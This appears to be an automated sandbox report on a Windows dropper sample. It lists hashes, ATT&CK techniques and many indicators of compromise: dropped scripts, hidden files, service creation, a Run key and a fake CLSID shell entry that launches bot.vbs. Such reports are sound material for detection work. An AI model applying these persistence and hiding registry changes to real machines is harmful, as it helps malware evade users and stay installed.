966b99614aab1c2aca8dd0aaaa0d137ad4a3a0fe8f5c3310606bfb483175b101

Analysis

max time kernel
134s
max time network
128s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-12-2024 12:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
Size

347KB
MD5

c29087510295d91f0f0e08cb812324c9
SHA1

387184643a119827ca49c36f1d3bf3bb754e3511
SHA256

966b99614aab1c2aca8dd0aaaa0d137ad4a3a0fe8f5c3310606bfb483175b101
SHA512

4f9412586cefa740c132c96aecf5a774e4b6464087bb930346c64b5d6284f34b7c18af9fafb14e9561e3848fb25f94add8cdddcae92ca43250a67cdd206a3fa3
SSDEEP

6144:tTfFDbRnOTrt5Jbd2RrIH4ZWpGeEAMQaEABWfeqhI7/NeOvHDqi4uyaXt6kAw0h9:D5OD45o6nQVMWfze71H7p4u/XZAw0oq

Score

8^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2576	attrib.exe
2656	attrib.exe
2236	attrib.exe

Executes dropped EXE 4 IoCs

pid	Process
908	setup.exe
2204	msn.exe
888	msndown.exe
2128	cpa.exe

Loads dropped DLL 5 IoCs

pid	Process
1836	cmd.exe
1836	cmd.exe
2204	msn.exe
1836	cmd.exe
1836	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\UUSEE = "C:\\Program Files (x86)\\Common Files\\uusee\\UUSeeMediaCenter.exe"	cpa.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Kingsoft\myfile\soft\setup.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\starts.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\网址导航.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\tools.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Windows NT\se1.vbs	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\soft\msn.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\setup.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	attrib.exe
File opened for modification	C:\Program Files\Windows NT\se1.vbs	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\file.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\file.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\se.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\cpa.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\361.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\fav.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\安全工具.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\se1.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\Microsoft	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\starts.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\361.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\tools.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\runonce.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\360.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\cpa.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\tao.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\tao2.ico	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\soft\msn.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\open.vbs	attrib.exe
File opened for modification	C:\Program Files\Windows NT\se.vbs	cmd.exe
File created	C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\Kingsoft	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\fav.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\fav\软件下载.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\fav\网址导航.url	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile\360.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File opened for modification	C:\Program Files\Kingsoft\myfile	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\__tmp_rar_sfx_access_check_259437915	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\open.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\se1.vbs	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\tool.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\runonce.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\soft\cpa.exe	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
File created	C:\Program Files\Kingsoft\myfile\cpa.cmd	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
660	sc.exe
300	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msndown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cpa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Service Discovery 1 TTPs 3 IoCs

Adversaries may try to gather information about registered local system services.

discovery

System Service Discovery

T1007

pid	Process
1768	net.exe
392	net1.exe
660	sc.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FD2DE501-B23C-11EF-A0C3-D60C98DC526F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439477916"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000937356f1d917cf44b81e187890f43c8e0000000002000000000010660000000100002000000091de59e4bb2d96c077463550931d385a3cc9df61552baf2b675e1f13c5b19f20000000000e80000000020000200000006d31428f2bca62490a9cc1fc4d233b697a6d0225a76b9ce0c826849e1bc1cb8d900000000bb544356c6e7ed9be4df44a55909459c075192b50a3264f2f63ccd37229e319c09ebf0a154a7825d2efad8529ebd4a3f4b3419ea7b809e989107f87991cfb0b54739e40fb99507dbf143e4c5244e3c682b1903c9fde6bc578a073af988296b25d60e49097a2d3c246de2c3eebb0094db44aa2a5c5367cb1e466152665329939cc2b6f11a5c59a727ce59715836384ba400000000055fab29787c9bbf0d521e147cba5e9bba8f839ad46fb89fa4b5f66c38e6e99ac74bbfa7cdfec238fd2f0c464986f32dc5c9ae8cbcbee6e3252c0f3936aa1ce	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000937356f1d917cf44b81e187890f43c8e00000000020000000000106600000001000020000000d39e0dcd606f93512b063abed0dbd87258f90a93eefb039579b03041ed8fba10000000000e80000000020000200000007f0ea51b92d1dc1ff66e65e5354e3a4a667a5c341bec42de8f45b7d37ae8ff7e20000000e4e86be8d2efa6b1d156d30b8d8d70a3fadf93a673c53ba95ad6600260b556d84000000016955e6888c4701ab800dcc221f0366bb9924da99e62d5d03b31825113fed549dd19f1659a4882eabec083cd3805d8e7ee65f5073a6d130dacc35fd9c1f44bc7	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90b88fd34946db01	iexplore.exe

Modifies registry class 44 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\Attributes = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
